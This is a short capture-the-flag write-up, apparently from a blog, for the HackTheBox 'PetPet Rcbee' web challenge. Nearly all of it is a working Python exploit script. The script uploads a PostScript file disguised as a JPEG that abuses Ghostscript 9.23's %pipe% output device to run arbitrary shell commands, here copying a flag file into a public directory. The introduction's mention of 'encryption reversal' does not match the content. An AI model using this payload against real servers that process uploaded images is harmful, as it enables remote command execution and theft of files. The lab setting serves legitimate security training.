Post

HackTheBox PetPet Rcbee Writeup

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the PetPet Rcbee Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

The source indicates that it’s using ghostscript 9.23 which is outdated.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

#!/usr/bin/env python3
import requests
import sys
import os

if len(sys.argv) < 2:
    print(f"Usage: {sys.argv[0]} <url>")
    sys.exit(1)

upload_url = f"http://{sys.argv[1]}/api/upload"
flag_url = f"http://{sys.argv[1]}/static/petpets/flag.txt"
file_name = "exploit.jpg"
payload = "%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: -0 -0 100 100\n\nuserdict /setpagedevice undef\nsave\nlegal\n{ null restore } stopped { pop } if\n{ legal } stopped { pop } if\nrestore\nmark /OutputFile (%pipe%cp /app/flag /app/application/static/petpets/flag.txt) currentdevice putdeviceprops"
try:
    with open(file_name, 'wb') as f:
        f.write(payload.encode())
    with open(file_name, 'rb') as f:
        files = {'file': ('exploit.jpg', f, 'image/jpeg')}
        response = requests.post(upload_url, files=files)
    if response.status_code == 200:
        print("Exploit uploaded successfully.")
        flag_response = requests.get(flag_url)
        if flag_response.status_code == 200:
            print("Flag found:")
            print(flag_response.text)
        else:
            print(f"Failed to retrieve flag. Status code: {flag_response.status_code}")
    else:
        print(f"Upload failed with status code: {response.status_code}")
        print(f"Response content: {response.text}")
except FileNotFoundError:
    print("Error: Exploit image not found. Payload may have failed.")
except requests.RequestException as e:
    print(f"Error during request: {e}")
finally:
    if os.path.exists(file_name):
        os.remove(file_name)

Summary

PetPet Rcbee leverages a vulnerability in Ghostscript 9.23 to execute arbitrary commands through a crafted PostScript payload. The exploit is uploaded via an API, enabling the attacker to copy the flag to a publicly accessible directory for retrieval.

challenge
htb challenge writeup linux web
This post is licensed under CC BY 4.0 by the author.